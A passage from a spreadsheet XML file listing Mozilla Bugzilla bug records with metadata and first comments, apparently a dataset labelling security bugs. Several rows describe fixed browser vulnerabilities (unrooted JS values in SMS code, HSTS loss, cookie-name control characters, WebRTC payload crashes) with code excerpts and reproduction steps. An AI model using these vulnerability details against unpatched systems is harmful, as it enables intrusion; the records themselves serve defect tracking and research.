        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P580" t="inlineStr">
        <is>
          <t>[infrasec:xss][ws:critical]</t>
        </is>
      </c>
      <c r="Q580" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R580" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S580" t="inlineStr">
        <is>
          <t>Bugzilla 4.0</t>
        </is>
      </c>
      <c r="T580" t="n">
        <v>1</v>
      </c>
      <c r="U580" t="n">
        <v>0</v>
      </c>
      <c r="V580" t="n">
        <v>14</v>
      </c>
      <c r="W580" t="inlineStr">
        <is>
          <t>Created attachment 498075
patch - v1
I haven't confirmed that this actually is valid, but from what crazy YUI stuff I've seen in the last hour, I suspect it probably is.</t>
        </is>
      </c>
      <c r="X580" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="581">
      <c r="A581" t="n">
        <v>864558</v>
      </c>
      <c r="B581" t="inlineStr">
        <is>
          <t>2013-04-22 16:31:31 -0700</t>
        </is>
      </c>
      <c r="C581" t="inlineStr">
        <is>
          <t>It's a horrible idea to do |new JS::Value[n]| and not root it/its contents while filling it in, and while using it after</t>
        </is>
      </c>
      <c r="D581" t="inlineStr">
        <is>
          <t>2013-11-25 16:40:50 -0800</t>
        </is>
      </c>
      <c r="E581" t="n">
        <v>1</v>
      </c>
      <c r="F581" t="n">
        <v>1</v>
      </c>
      <c r="G581" t="n">
        <v>6</v>
      </c>
      <c r="H581" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I581" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J581" t="inlineStr">
        <is>
          <t>Gaia::SMS</t>
        </is>
      </c>
      <c r="K581" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L581" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M581" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N581" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O581" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P581" t="inlineStr">
        <is>
          <t>[adv-main21+][adv-esr1706+]</t>
        </is>
      </c>
      <c r="Q581" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R581" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S581" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T581" t="n">
        <v>1</v>
      </c>
      <c r="U581" t="n">
        <v>0</v>
      </c>
      <c r="V581" t="n">
        <v>24</v>
      </c>
      <c r="W581" t="inlineStr">
        <is>
          <t>Created attachment 740546
Patch
In SmsFilter::GetNumbers:
  uint32_t length = mData.numbers().Length();
  if (length == 0) {
    *aNumbers = JSVAL_NULL;
    return NS_OK;
  }
  JS::Value* numbers = new JS::Value[length];
  for (uint32_t i=0; i&lt;length; ++i) {
    numbers[i].setString(JS_NewUCStringCopyN(aCx, mData.numbers()[i].get(),
                                             mData.numbers()[i].Length()));
  }
  aNumbers-&gt;setObjectOrNull(JS_NewArrayObject(aCx, length, numbers));
  NS_ENSURE_TRUE(aNumbers-&gt;isObject(), NS_ERROR_FAILURE);
  return NS_OK;
If any of the JS_NewUCStringCopyN trigger a GC, anything before |numbers[i]| is likely to be garbage that'll trigger a crash on GC after the JS_NewArrayObject object gets collected at some later time.
Similarly, in SmsManager::Send:
  JS::Value* requests = new JS::Value[size];
  for (uint32_t i=0; i&lt;size; ++i) {
    JS::Value number;
    if (!JS_GetElement(cx, &amp;numbers, i, &amp;number)) {
      return NS_ERROR_INVALID_ARG;
    }
    nsresult rv = Send(cx, global, number.toString(), aMessage, &amp;requests[i]);
    NS_ENSURE_SUCCESS(rv, rv);
  }
  aReturn-&gt;setObjectOrNull(JS_NewArrayObject(cx, size, requests));
  NS_ENSURE_TRUE(aReturn-&gt;isObject(), NS_ERROR_FAILURE);
|aNumbers| is user-controlled.  JS_GetElement can call arbitrary JS code.  Send may as well, to create the SmsRequest objects that get returned.  All returned values will get shoved into |requests|, but none of those locations are roots, so the returned objects will probably end up being collected.  Then when the JS_NewArrayObject object gets GC'd, we'll probably crash.
The solution in both places is to use a value array type that the JS engine knows about, so that everything in it is properly rooted.
The SmsManager::Send code also looks pretty broken if someone calls the API passing a non-array object, or an array that doesn't contain all strings, so I "fixed" those issues too, in passing, so that at least crashes don't happen.  There seems to be no spec for how any of this should work, so not-crashing is the best I can do in a quick fix.
Technically as the SMS code is behind the privileged firewall these issues aren't vulnerabilities, in theory, but I'd rather play it safe just in case.</t>
        </is>
      </c>
      <c r="X581" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="582">
      <c r="A582" t="n">
        <v>2298</v>
      </c>
      <c r="B582" t="inlineStr">
        <is>
          <t>1999-01-12 10:07:11 -0800</t>
        </is>
      </c>
      <c r="C582" t="inlineStr">
        <is>
          <t>Can't change OS when modifying a bug report</t>
        </is>
      </c>
      <c r="D582" t="inlineStr">
        <is>
          <t>2014-04-28 17:48:22 -0700</t>
        </is>
      </c>
      <c r="E582" t="n">
        <v>1</v>
      </c>
      <c r="F582" t="n">
        <v>1</v>
      </c>
      <c r="G582" t="n">
        <v>4</v>
      </c>
      <c r="H582" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I582" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J582" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K582" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L582" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M582" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N582" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O582" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P582" t="inlineStr"/>
      <c r="Q582" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R582" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S582" t="inlineStr">
        <is>
          <t>Bugzilla old</t>
        </is>
      </c>
      <c r="T582" t="n">
        <v>1</v>
      </c>
      <c r="U582" t="n">
        <v>0</v>
      </c>
      <c r="V582" t="n">
        <v>8</v>
      </c>
      <c r="W582" t="inlineStr">
        <is>
          <t>Summary says it all.</t>
        </is>
      </c>
      <c r="X582" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="583">
      <c r="A583" t="n">
        <v>387954</v>
      </c>
      <c r="B583" t="inlineStr">
        <is>
          <t>2007-07-12 16:22:26 -0700</t>
        </is>
      </c>
      <c r="C583" t="inlineStr">
        <is>
          <t>NT version of PR_Accept on IPv6 listen socket fails with INVALID_ARGS</t>
        </is>
      </c>
      <c r="D583" t="inlineStr">
        <is>
          <t>2007-11-06 00:45:52 -0800</t>
        </is>
      </c>
      <c r="E583" t="n">
        <v>1</v>
      </c>
      <c r="F583" t="n">
        <v>1</v>
      </c>
      <c r="G583" t="n">
        <v>3</v>
      </c>
      <c r="H583" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I583" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="J583" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="K583" t="inlineStr">
        <is>
          <t>3.0</t>
        </is>
      </c>
      <c r="L583" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M583" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N583" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O583" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P583" t="inlineStr"/>
      <c r="Q583" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R583" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S583" t="inlineStr">
        <is>
          <t>4.6.8</t>
        </is>
      </c>
      <c r="T583" t="n">
        <v>1</v>
      </c>
      <c r="U583" t="n">
        <v>0</v>
      </c>
      <c r="V583" t="n">
        <v>17</v>
      </c>
      <c r="W583" t="inlineStr">
        <is>
          <t>Created attachment 272082
test program source
Tested with trunk (NSPR 4.7 Beta), but also seen with recent NSPR releases
(4.6.x).
The attached program runs fine when run on WinXP with the Win95 version of NSPR.
But when run with the NT version of NSPR, it fails and prints this message:
PR_Accept(): no socket! NSPR ERR: -5987, Invalid function argument
I traced it into _PR_MD_FAST_ACCEPT, to this call to AcceptEX in ntio.c 
at line 1351:
    rv = AcceptEx((SOCKET)osfd,
                  accept_sock,
                  me-&gt;md.acceptex_buf,
                  0,
                  INET_ADDR_PADDED,
                  INET_ADDR_PADDED,
                  &amp;bytes,
                  &amp;(me-&gt;md.overlapped.overlapped));
The stack looked like this:
libnspr4.dll!_PR_MD_FAST_ACCEPT(PRFileDesc * fd=0x003953f0, PRNetAddr * raddr=0x0012fe84, unsigned int * rlen=0x0012fe20, unsigned int timeout=4294967295, int fast=0, void (void *)* callback=0x00000000, void * callbackArg=0x00000000)  Line 1362
libnspr4.dll!SocketAccept(PRFileDesc * fd=0x003953f0, PRNetAddr * addr=0x0012fe84, unsigned int timeout=4294967295)  Line 424 + 0x1b bytes
libnspr4.dll!PR_Accept(PRFileDesc * fd=0x003953f0, PRNetAddr * addr=0x0012fe84, unsigned int timeout=4294967295)  Line 199 + 0x16 bytes	
IPv6serv.exe!main(int argc=1, char * * argv=0x00393098)  Line 66 + 0x13 bytes
The call returned zero, and err was 10022, which is WSAEINVAL.
I'm afraid this is a P1 for Sun.</t>
        </is>
      </c>
      <c r="X583" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="584">
      <c r="A584" t="n">
        <v>914618</v>
      </c>
      <c r="B584" t="inlineStr">
        <is>
          <t>2013-09-10 06:28:16 -0700</t>
        </is>
      </c>
      <c r="C584" t="inlineStr">
        <is>
          <t>It's possible to modify anonymous content of pluginProblem.xml binding</t>
        </is>
      </c>
      <c r="D584" t="inlineStr">
        <is>
          <t>2017-10-10 10:12:39 -0700</t>
        </is>
      </c>
      <c r="E584" t="n">
        <v>1</v>
      </c>
      <c r="F584" t="n">
        <v>1</v>
      </c>
      <c r="G584" t="n">
        <v>3</v>
      </c>
      <c r="H584" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I584" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J584" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K584" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L584" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M584" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N584" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O584" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P584" t="inlineStr">
        <is>
          <t>Embargo until b2g18 EOL [adv-main25+][adv-esr24-1+]</t>
        </is>
      </c>
      <c r="Q584" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R584" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S584" t="inlineStr">
        <is>
          <t>mozilla27</t>
        </is>
      </c>
      <c r="T584" t="n">
        <v>1</v>
      </c>
      <c r="U584" t="n">
        <v>0</v>
      </c>
      <c r="V584" t="n">
        <v>30</v>
      </c>
      <c r="W584" t="inlineStr">
        <is>
          <t>This is basically the same as bug 911864, but this does not need document.getAnonymousNodes, so bug 912322 does not fix this.
(In reply to Bobby Holley (:bholley) from bug 911864 comment #10)
&gt; No, this bug is more about pluginProblem, which we can't allow content to
&gt; change due to the threat of clickjacking.
&gt; Modifying pluginProblem AC would indeed be a problem, but AFAICT the exploit
&gt; here only allows it to be read/cloned.
It's possible to modify pluginProblem AC.
Also, it's possible to trigger two types of assertion failures.</t>
        </is>
      </c>
      <c r="X584" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="585">
      <c r="A585" t="n">
        <v>729570</v>
      </c>
      <c r="B585" t="inlineStr">
        <is>
          <t>2012-02-22 09:08:58 -0800</t>
        </is>
      </c>
      <c r="C585" t="inlineStr">
        <is>
          <t>create different homepage for tablet/phone/maple.</t>
        </is>
      </c>
      <c r="D585" t="inlineStr">
        <is>
          <t>2012-02-23 07:08:06 -0800</t>
        </is>
      </c>
      <c r="E585" t="n">
        <v>1</v>
      </c>
      <c r="F585" t="n">
        <v>1</v>
      </c>
      <c r="G585" t="n">
        <v>5</v>
      </c>
      <c r="H585" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I585" t="inlineStr">
        <is>
          <t>Marketing</t>
        </is>
      </c>
      <c r="J585" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K585" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L585" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M585" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N585" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O585" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P585" t="inlineStr"/>
      <c r="Q585" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R585" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S585" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T585" t="n">
        <v>1</v>
      </c>
      <c r="U585" t="n">
        <v>0</v>
      </c>
      <c r="V585" t="n">
        <v>2</v>
      </c>
      <c r="W585" t="inlineStr">
        <is>
          <t>with the working demos…</t>
        </is>
      </c>
      <c r="X585" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="586">
      <c r="A586" t="n">
        <v>531176</v>
      </c>
      <c r="B586" t="inlineStr">
        <is>
          <t>2009-11-25 15:21:15 -0800</t>
        </is>
      </c>
      <c r="C586" t="inlineStr">
        <is>
          <t>Add assertion that it's safe to run scripts before dispatching any events (and fix the cases when events are dispatched at unsafe time)</t>
        </is>
      </c>
      <c r="D586" t="inlineStr">
        <is>
          <t>2010-07-23 12:42:51 -0700</t>
        </is>
      </c>
      <c r="E586" t="n">
        <v>1</v>
      </c>
      <c r="F586" t="n">
        <v>1</v>
      </c>
      <c r="G586" t="n">
        <v>3</v>
      </c>
      <c r="H586" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I586" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J586" t="inlineStr">
        <is>
          <t>DOM: Events</t>
        </is>
      </c>
      <c r="K586" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L586" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M586" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N586" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O586" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P586" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q586" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R586" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S586" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T586" t="n">
        <v>1</v>
      </c>
      <c r="U586" t="n">
        <v>0</v>
      </c>
      <c r="V586" t="n">
        <v>38</v>
      </c>
      <c r="W586" t="inlineStr">
        <is>
          <t>It doesn't appear that we check nsContentUtils::IsSafeToRunScripts() before running the event dispatch code.  We probably should add an assertion to this effect to help catch unsafe event dispatches.</t>
        </is>
      </c>
      <c r="X586" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="587">
      <c r="A587" t="n">
        <v>1757138</v>
      </c>
      <c r="B587" t="inlineStr">
        <is>
          <t>2022-02-25 00:24:27 -0800</t>
        </is>
      </c>
      <c r="C587" t="inlineStr">
        <is>
          <t>HSTS policy "forgotten" on Firefox for Android (HTTP request in next browsing session does not redirect to HTTPS)</t>
        </is>
      </c>
      <c r="D587" t="inlineStr">
        <is>
          <t>2022-08-27 22:43:46 -0700</t>
        </is>
      </c>
      <c r="E587" t="n">
        <v>1</v>
      </c>
      <c r="F587" t="n">
        <v>1</v>
      </c>
      <c r="G587" t="n">
        <v>3</v>
      </c>
      <c r="H587" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I587" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J587" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K587" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L587" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M587" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N587" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O587" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P587" t="inlineStr">
        <is>
          <t>[psm-assigned][post-critsmash-triage][adv-main100+]</t>
        </is>
      </c>
      <c r="Q587" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R587" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S587" t="inlineStr">
        <is>
          <t>100 Branch</t>
        </is>
      </c>
      <c r="T587" t="n">
        <v>1</v>
      </c>
      <c r="U587" t="n">
        <v>0</v>
      </c>
      <c r="V587" t="n">
        <v>19</v>
      </c>
      <c r="W587" t="inlineStr">
        <is>
          <t>Steps to reproduce:
1. Navigate to http://radio.indymedia.org in Android Firefox 97.2.0 (Build #2015863827)
2. Navigate to https://radio.indymedia.org which has HSTS header (Strict-Transport-Security: max-age=63072000; includeSubDomains; preload)
3. At this point, HSTS appears to work (HTTP request directs to HTTPS)
4. Use other apps for a while or reboot phone
5. Return to Firefox and visit http://radio.indymedia.org and it loads; however the browser should have redirected me to https://radio.indymedia.org
Actual results:
HTTP website loaded again despite HSTS policy
Expected results:
Automatic redirect to HTTPS</t>
        </is>
      </c>
      <c r="X587" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="588">
      <c r="A588" t="n">
        <v>1780842</v>
      </c>
      <c r="B588" t="inlineStr">
        <is>
          <t>2022-07-22 09:38:06 -0700</t>
        </is>
      </c>
      <c r="C588" t="inlineStr">
        <is>
          <t>screen recording disabled in incognito mode, still leaking sensitive information in the address bar.</t>
        </is>
      </c>
      <c r="D588" t="inlineStr">
        <is>
          <t>2024-06-12 05:39:08 -0700</t>
        </is>
      </c>
      <c r="E588" t="n">
        <v>1</v>
      </c>
      <c r="F588" t="n">
        <v>1</v>
      </c>
      <c r="G588" t="n">
        <v>2</v>
      </c>
      <c r="H588" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I588" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J588" t="inlineStr">
        <is>
          <t>Toolbar</t>
        </is>
      </c>
      <c r="K588" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L588" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M588" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N588" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O588" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P588" t="inlineStr">
        <is>
          <t>[adv-main112+][reporter-external] [web-bounty-form]</t>
        </is>
      </c>
      <c r="Q588" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R588" t="inlineStr">
        <is>
          <t>S4</t>
        </is>
      </c>
      <c r="S588" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T588" t="n">
        <v>1</v>
      </c>
      <c r="U588" t="n">
        <v>0</v>
      </c>
      <c r="V588" t="n">
        <v>22</v>
      </c>
      <c r="W588" t="inlineStr">
        <is>
          <t>Created attachment 9286682
address bar still leaking sensitive information
hi Firefox.
I noticed that Firefox for android has a feature to disable screen capture/screenshot on incognito tabs, but the feature still leaks information in the address bar while recording the screen.
production step:
1. Install Firefox for Android with the latest version
2. then disable the screen recording feature/screenshot for incognito tabs
3. And testing, screen recording, see the address bar is still visible, allowing the victim's sensitive parameters to be exposed in the wild.
impact :
The attacker can see sensitive information in the victim's address bar, in the form of access tokens, emails, passwords, even secret parameters, etc..</t>
        </is>
      </c>
      <c r="X588" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="589">
      <c r="A589" t="n">
        <v>1802057</v>
      </c>
      <c r="B589" t="inlineStr">
        <is>
          <t>2022-11-22 18:02:26 -0800</t>
        </is>
      </c>
      <c r="C589" t="inlineStr">
        <is>
          <t>Firefox accepts 0x7F in cookie names (and others?)</t>
        </is>
      </c>
      <c r="D589" t="inlineStr">
        <is>
          <t>2024-05-30 11:02:46 -0700</t>
        </is>
      </c>
      <c r="E589" t="n">
        <v>1</v>
      </c>
      <c r="F589" t="n">
        <v>1</v>
      </c>
      <c r="G589" t="n">
        <v>3</v>
      </c>
      <c r="H589" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I589" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J589" t="inlineStr">
        <is>
          <t>Networking: Cookies</t>
        </is>
      </c>
      <c r="K589" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L589" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M589" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N589" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O589" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P589" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?] [necko-triaged][necko-next][necko-priority-queue][adv-main119+]</t>
        </is>
      </c>
      <c r="Q589" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R589" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S589" t="inlineStr">
        <is>
          <t>119 Branch</t>
        </is>
      </c>
      <c r="T589" t="n">
        <v>1</v>
      </c>
      <c r="U589" t="n">
        <v>0</v>
      </c>
      <c r="V589" t="n">
        <v>13</v>
      </c>
      <c r="W589" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1797235 +++
bug 1797235 fixed an issue where the values of cookies set via `document.cookie` were not checked for invalid control characters. I happened to notice in the patch that nearby we have a completely separate blacklist of characters for `CookieCommons::CheckName()`, and that this list is missing 0x7F which is clearly forbidden by the spec. This name check is used for both HTTP and non-HTTP (scripted) cookies, unlike bug 1797235 which was limited to non-HTTP cookies. As an example, the following is allowed in Firefox, and breaks sites like https://instagram.com. It would also be allowed via HTTP `Set-Cookie:` assuming there's no generic Necko code that would reject the whole header before calling the cookie-specific code (haven't tested).
```javascript
  document.cookie = "a\x7Fa=test";
```
We might want to reject additional characters. If we've gotten far enough to think we have a cookie name, and yet there's a semi-colon (0x3B) in it that's a pretty impossible state. We should think hard about why we don't use the same set of illegal characters for name and value.
But at the very least we have to add 0x7F to the forbidden list.</t>
        </is>
      </c>
      <c r="X589" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="590">
      <c r="A590" t="n">
        <v>217538</v>
      </c>
      <c r="B590" t="inlineStr">
        <is>
          <t>2003-08-27 21:16:07 -0700</t>
        </is>
      </c>
      <c r="C590" t="inlineStr">
        <is>
          <t>softoken databases cannot be shared between multiple processes</t>
        </is>
      </c>
      <c r="D590" t="inlineStr">
        <is>
          <t>2014-11-21 09:20:57 -0800</t>
        </is>
      </c>
      <c r="E590" t="n">
        <v>1</v>
      </c>
      <c r="F590" t="n">
        <v>1</v>
      </c>
      <c r="G590" t="n">
        <v>3</v>
      </c>
      <c r="H590" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I590" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J590" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K590" t="inlineStr">
        <is>
          <t>3.8</t>
        </is>
      </c>
      <c r="L590" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M590" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N590" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O590" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P590" t="inlineStr"/>
      <c r="Q590" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R590" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S590" t="inlineStr">
        <is>
          <t>3.12</t>
        </is>
      </c>
      <c r="T590" t="n">
        <v>1</v>
      </c>
      <c r="U590" t="n">
        <v>1</v>
      </c>
      <c r="V590" t="n">
        <v>70</v>
      </c>
      <c r="W590" t="inlineStr">
        <is>
          <t>The Berkeley DB database code we are using in NSS by default is only safe if one
process is writing to the cert and key databases at a time. If multiple
applications start up, and all initialize NSS read/write, the databases will
become corrupt over time.
Fixing this requires replacing Berkeley DB with a better database engine, which
would talk to a local database server.</t>
        </is>
      </c>
      <c r="X590" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="591">
      <c r="A591" t="n">
        <v>1433005</v>
      </c>
      <c r="B591" t="inlineStr">
        <is>
          <t>2018-01-24 17:16:09 -0800</t>
        </is>
      </c>
      <c r="C591" t="inlineStr">
        <is>
          <t>Crash when WebRTC RTP payload type is incorrect</t>
        </is>
      </c>
      <c r="D591" t="inlineStr">
        <is>
          <t>2019-05-24 05:04:08 -0700</t>
        </is>
      </c>
      <c r="E591" t="n">
        <v>1</v>
      </c>
      <c r="F591" t="n">
        <v>1</v>
      </c>
      <c r="G591" t="n">
        <v>3</v>
      </c>
      <c r="H591" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I591" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J591" t="inlineStr">
        <is>
          <t>WebRTC</t>
        </is>
      </c>
      <c r="K591" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L591" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M591" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N591" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O591" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P591" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main59+][adv-esr52.7+]</t>
        </is>
      </c>
      <c r="Q591" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R591" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S591" t="inlineStr">
        <is>
          <t>mozilla60</t>
        </is>
      </c>
      <c r="T591" t="n">
        <v>1</v>
      </c>
      <c r="U591" t="n">
        <v>0</v>
      </c>
      <c r="V591" t="n">
        <v>42</v>
      </c>
      <c r="W591" t="inlineStr">
        <is>
          <t>We discovered by accident that if from our remote WebRTC endpoint we send RTP packets with a correct SSRC and body but an incorrect PayloadType we can crash Firefox and cause invalid read/write or divide by zero exceptions.
The details of what we are sending are RTP packets with contents originally generated by a client using Chrome with opus/48000/2 contents, but the payload type from Chrome is 111 and we were inadvertently putting that into the payload type for the packet forwarded to Firefox rather than 109 as Firefox desired via the negotiated SDP for it.  The Firefox client receiving the packet seemed to consider it valid, about:webrtc showed packets being received and no errors, various WebRTC logging in Firefox also looked happy, but fairly quickly we’d crash with one of the below presumably because the audio decoding was invalid due to incorrect payload type.
Once we fixed our server code forwarding these packets to set correct payload types all the crashes stopped, but this appears to be a remotely exploitable crash bug at the least with possible remote code execution potential if packets were carefully crafted and targeted? So just in case, I've marked this as a security bug.
Links to submitted crash reports:
https://crash-stats.mozilla.com/report/index/bp-c1cd72f1-a6f4-40de-84bb-a1ac30180123 - Write Violation
https://crash-stats.mozilla.com/report/index/bp-ffd44cad-17cc-4d8c-b94d-98b0f0180123 - Divide by Zero
https://crash-stats.mozilla.com/report/index/54087df8-9b05-4c7c-af2e-a2c270180123 - Read Violation</t>
        </is>
      </c>
      <c r="X591" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="592">
      <c r="A592" t="n">
        <v>1620542</v>
      </c>
      <c r="B592" t="inlineStr">
        <is>
          <t>2020-03-06 02:07:55 -0800</t>
        </is>
      </c>
      <c r="C592" t="inlineStr">
        <is>
          <t>Turn on ESLint for .eslintrc.js files</t>
        </is>
      </c>
      <c r="D592" t="inlineStr">
        <is>
          <t>2022-08-17 14:00:53 -0700</t>
        </is>
      </c>
      <c r="E592" t="n">
        <v>1</v>
      </c>
      <c r="F592" t="n">
        <v>1</v>
